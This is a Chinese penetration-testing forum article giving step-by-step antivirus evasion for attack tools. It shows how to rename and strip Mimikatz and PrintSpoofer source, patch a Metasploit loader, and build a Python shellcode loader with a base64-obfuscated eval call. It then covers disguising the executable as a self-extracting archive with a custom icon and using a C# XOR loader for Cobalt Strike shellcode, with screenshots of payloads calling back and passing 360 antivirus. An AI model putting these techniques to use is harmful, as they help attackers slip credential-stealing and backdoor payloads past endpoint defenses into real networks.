问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
内网渗透-常用工具免杀
渗透测试
# 内网渗透-常用工具免杀 ## Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资...
内网渗透-常用工具免杀 =========== Mimikatz免杀 ---------- Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工具特别出名所以被查杀的机率很大, 我们可以通过 github 上的开源代码对其进行源码免杀从而 bypass 反病毒软件。 Mimikatz 源代码下载 <https://github.com/gentilkiwi/mimikatz> **免杀步骤** 替换 mimikatz 关键字 shenghuo [data:image/s3,"s3://crabby-images/663ef/663efc4b6389affaea11ac2fa59a423b0d130277" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-244bca8d5b6dd76bb209c41927093c1db988ef13.png) mimikatz 下的文件全部改为 shenghu [data:image/s3,"s3://crabby-images/ef066/ef06652a5eae65b734d89857fad7975b398b379c" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-817c7a402e770b251240dd91209e7b7df9298474.png) 把项目里所有的文件注释去掉 / *Benjamin DELPY `gentilkiwi` <http://blog.gentilkiwi.com> benjamin@gentilkiwi.com Licence : <https://creativecommons.org/licenses/by/4.0/>* / [data:image/s3,"s3://crabby-images/ec5e6/ec5e61e3b2644b6478ca259c45c715eef7807942" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-4b3cb9c98747cf0299bf9072677ed0d9fe95a3a6.png) 打开红色框框内的内容,替换图标文件 [data:image/s3,"s3://crabby-images/7c3a1/7c3a15a10d042301d7f9acdeebabd6fdbc9e2a80" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-de00135c73f9a9de8c4a0f61c068d898afed78da.png) 出现 无法找到 v140 的生成工具(平台工具集 =“v140”),要选择自己安装的平台工具集 [data:image/s3,"s3://crabby-images/2043f/2043f25b72dfb9a0d0dea163ef7c0f8c1036b4f2" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-5f2caeafd4073f86fb9c194e1cce593b761367ca.png) 重新生成 [data:image/s3,"s3://crabby-images/03b9b/03b9b6828f1b0ea91d8f57eeb1ff686bb7315978" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-bb256db9da7633c7739004a464c56a1fdd4bb382.png) 生成的程序能够正确运行 [data:image/s3,"s3://crabby-images/650ae/650ae0d8c5d8b2c0d353c0918ed5209f50d11957" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-9827ddcd538d044a6746b5121efbf2d5d0e1eaa6.png) 成功过360 [data:image/s3,"s3://crabby-images/a8740/a874065d18888f21ce4ad290c03084586c10b232" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-90fe115a6fbe4454518255cfce32edc97cf5719c.png) PrintSpoofer做免杀 printspoofer提权工具目前主流的提权工具之一,360 安全会自动查杀,其他杀毒软件并不会查杀。 源码下载地址: <https://github.com/itm4n/PrintSpoofer> [data:image/s3,"s3://crabby-images/6d657/6d6578ee7d0fe939e6d65ed3568972c91c310580" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-6580776fb17d8dd6611624c3b5f7194b33f676d6.png) 将PrintSpoofer.cpp 里面的输出帮助文档全部清空 [data:image/s3,"s3://crabby-images/4529b/4529bc40ad9d91e75275885f8eac7c3cfb2e4256" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-6ada54429d454b1bf42bb81b1c4e5403384ab913.png) 导入图标 [data:image/s3,"s3://crabby-images/53a54/53a5466b2ed2b7b2678b287e152078153472ac33" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-219fa4538e5054cfb4bb1995a74945f44a750d4d.png) 重新生成,程序生成成功 [data:image/s3,"s3://crabby-images/50df0/50df0859f4bf3649357fc1082c47b562d3bfb6ea" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-3ae1195aabb41318da2a0ebcf88c19d412867c7d.png) 成功过360 [data:image/s3,"s3://crabby-images/87946/87946167ebb458973d6932d5962c971a45b77dfa" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-18e820a64bb3ab02300499cba308e7441083f055.png) msf免杀 ----- metasploit 是一款开源的安全漏洞检测工具,同时Metasploit 是免费的工具,因此安全工作人员常用 Metasploit 工具来检测系统的安全性。Metasploit Framework (MSF) 在 2003 年以开放源码方式发布,是可以自由获取的开发框架。 它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、 shellcode 编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload) , 在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且 Metasploit 还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混 淆绕过一部分杀毒软件。 工具 Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup 下载地址 <https://sourceforge.net/projects/orwelldevcpp/> metasploit源码下载:metasploit-loader/master/src/main.c 选择:文件->新建项目->consoleApplication->c 项目 [data:image/s3,"s3://crabby-images/fa18c/fa18c728eed1452396cf79097d9b70119f2c327c" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-4b7d2de401dc320b5dcb89e59f4100915432cf8e.png) 把winsock2.h 移动到windows.h 上 不然编译会出错。 [data:image/s3,"s3://crabby-images/9c21a/9c21a3a0041fe50d8bf34483039179d4a0d84321" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d0a145baeb67b58d88a3688a4aa0f74163882bae.png) 将这四处的数字改为其他数字 [data:image/s3,"s3://crabby-images/b30b8/b30b8707c452ebc61b2bb89a0505ab41f21ad9d7" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b5a75c85566b49721b01d42caa95aac4c463fc36.png) 设置攻击载荷,执行后成功上线 [data:image/s3,"s3://crabby-images/a7159/a715960c1e8af5e3a182251ad6ba16460356ec10" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-bd5f5a3c71a94bb896c4f9d4b021e775efd87306.png) 成功过360 [data:image/s3,"s3://crabby-images/9c7ed/9c7edcc43f14751ed7bfa62550d2caa14386b251" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b64b49b0cdaa659065f1092be9ad74739dafa764.png) Python3 对Cobalt strike的 shellcode 做免杀 ------------------------------------- 生成python64位的shellcode [data:image/s3,"s3://crabby-images/265f3/265f34e44cddeb0ea16ab7948dec694fa605ecaf" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-30e105a451ca735d5139a436478d5c6f47798fbe.png) 添加生成的shellcode ```python import ctypes import base64 #shellcode 加载 def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40)) buf= (ctypes.c_char * len(shellcode)).from_buffer(shellcode) eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ==")) handle =ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) if __name__ == "__main__": shellCodeLoad(bytearray(b'你的shellcode'))//这里为你的添加的shellcode位置 ``` 编译成程序 pyinstaller -F test.py --noconsole 此时还要做的就是更改图标,这里介绍一种方法 首先右击它,选择“添加到压缩文件” [data:image/s3,"s3://crabby-images/57a35/57a35e52b25a49cf9518ba739ad57659c0d838e4" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-8551ab935cecbe032055e960b44b7537a96ab123.png) 在弹出来的一个“压缩文件名和参数”框中设置压缩文件格式为“ZIP”,压缩方式为“存储”,压缩选项为“创建自解压格式压缩文件”。 [data:image/s3,"s3://crabby-images/6cd18/6cd18704554d23720cdf88b92bcf151f2806eca1" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-9e052f771d547ccb9af7b4aa6b63740d4c23cff7.png) 随后选择“高级”选项卡。选择了“高级”选项卡以后直接点击“自解压选项” [data:image/s3,"s3://crabby-images/62e1e/62e1e59c5df2aba97964f7dad9ec601f9db13530" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-c405df1b56b7ec738f64c034487a0dbbc25fa535.png) 在设置选项卡中解压后运行对应程序 [data:image/s3,"s3://crabby-images/a825c/a825c569e34cd8a302039cb74364d06caede9e79" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d26fbf713a0d1b6239a2a817a3dbba6a107a2e67.png) 在模式选项卡中选择解压临时文件夹和全部隐藏 [data:image/s3,"s3://crabby-images/eca7c/eca7ce53756a2847dc02ede66df883fb21167262" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0e082d7b19f2a8483c1724be43fff62a7e4591d5.png) 随后再选择“更新”选项卡,再覆盖方式中选择“覆盖所有文件” [data:image/s3,"s3://crabby-images/9c83a/9c83a04d0c0dbe3421e052df607d885cadb9f58b" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-37958a5f202b058af5f4ac3b884716fe74d1f963.png) 最后选择“文本和图标”选项卡,在自定义自解压文件徽标和图标中选择“从文件加载自解压文件图标”,点击“浏览”,找到自己想要加载的图标文件后并打开 [data:image/s3,"s3://crabby-images/428fc/428fcdd8a0e9008a980769b2ef172d6ff894dc03" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d028fb2a71174f43e06aec37f26a66b38c5e7d9b.png) 然后就点击确定(两次)就可以生成一个新的exe程序了。图标已经改变了,再运行测试一下 [data:image/s3,"s3://crabby-images/537a0/537a0645dd300d7c39c6a6a2b5eacbce420ef165" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-224cb89112fa95d8b841ac5cd1958b3f9e7dfde3.png) 上传去目标主机,这里更改了程序名称 [data:image/s3,"s3://crabby-images/ef152/ef152a18cb9b4e4f045bffef422e390d8844aa16" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-56b6c0ca3bb910ae4394cff6ff8c2809322a4ac5.png) 在线查杀 [data:image/s3,"s3://crabby-images/ad1ae/ad1ae9747755d1f324ec3503d89674436841b437" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ad8c84110a7073bec197e7b4a049beabe1b1ffb9.png) c# xor 加载器免杀cobaltstrike的shellcode ---------------------------------- 是很流行的编程语言,也可以用它来做一个加载器运行cobaltstrike的 shellcode,生成出来的 文件特别的小,可以很好的投递传输。 项目地址 <https://github.com/antman1p/ShellCodeRunner> 用 vs2017 打开 sln 项目文件 [data:image/s3,"s3://crabby-images/2e5f5/2e5f5f9ffd8071711804644452ecd0b5342564fc" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ab3e1eec588620c3ce469a2b200c575a8d0bae35.png) 选择 xorkryptor 生成编码器 用 cobalt strike生成 raw 二进制文件 [data:image/s3,"s3://crabby-images/a3ec1/a3ec131e51650eec2514b200dd4ace0b7b5149f0" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-50cc4e338a4de40a06d388c681079da4b8bbbbc7.png) encrypt.bin 就是经过编码后的文件 [data:image/s3,"s3://crabby-images/a5b49/a5b49d51b21c3a21ba0113d634086eba82f723f7" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-30ee681ee79caa15d12c9956c9c11447d797faf2.png) 项目里面存有 Rsources 和 encrypt.bin 文件 事实上项目是没有这个文件夹和文 件所以再当前目录新建文件夹和将生成好的shellcode文件 encrypt.bin 复制到文 件夹里。右键选择编译文件即可。 [data:image/s3,"s3://crabby-images/dc1ec/dc1ec636c6182c3ef37d6cd447a071df504ccd16" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-698dd0c9bf042c8bf1e2016d436dcc1eeccc9f81.png) 此时文件正常 [data:image/s3,"s3://crabby-images/2ee04/2ee043b780812c3fa530bec7e328790530021b97" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-44752a7cad6ff7209b61baa3cff79aa42a8708c2.png) 重新编译,成功生成后门程序 [data:image/s3,"s3://crabby-images/7c11b/7c11b0fb813ca98dc7942cb0a814b180e266dda8" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-08dc1b2ba905827380412eb32d5bb08855f81f72.png) 成功过360 [data:image/s3,"s3://crabby-images/cf816/cf816f6cf6e952bca527ae25e997efdbb010caa3" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-f09d7daa9c8b98b06d1ec65851ad3b024442d9a8.png) 成功上线 [data:image/s3,"s3://crabby-images/2d709/2d7096bcdd7020cc81f33e76e29b3f76d7e5a8bc" alt=""](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-add9c264e592c03a7dd748701750a409636aac1a.png) **更多免杀技术文章:** <https://www.freebuf.com/sectool/278200.html> <https://www.freebuf.com/sectool/273890.html> <https://xz.aliyun.com/t/8921> [https://blog.csdn.net/weixin\_43901038/article/details/105873786](https://blog.csdn.net/weixin_43901038/article/details/105873786) [https://blog.csdn.net/qq\_33942040/article/details/106463360](https://blog.csdn.net/qq_33942040/article/details/106463360) [https://www.sohu.com/a/451485615\_120045376](https://www.sohu.com/a/451485615_120045376) <https://www.cnblogs.com/micr067/p/12407494.html> [https://blog.csdn.net/weixin\_43901038/article/details/105873786](https://blog.csdn.net/weixin_43901038/article/details/105873786)
发表于 2021-08-16 16:24:23
阅读 ( 7961 )
分类:
内网渗透
1 推荐
收藏
0 条评论
请先
登录
后评论
hrk
3 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!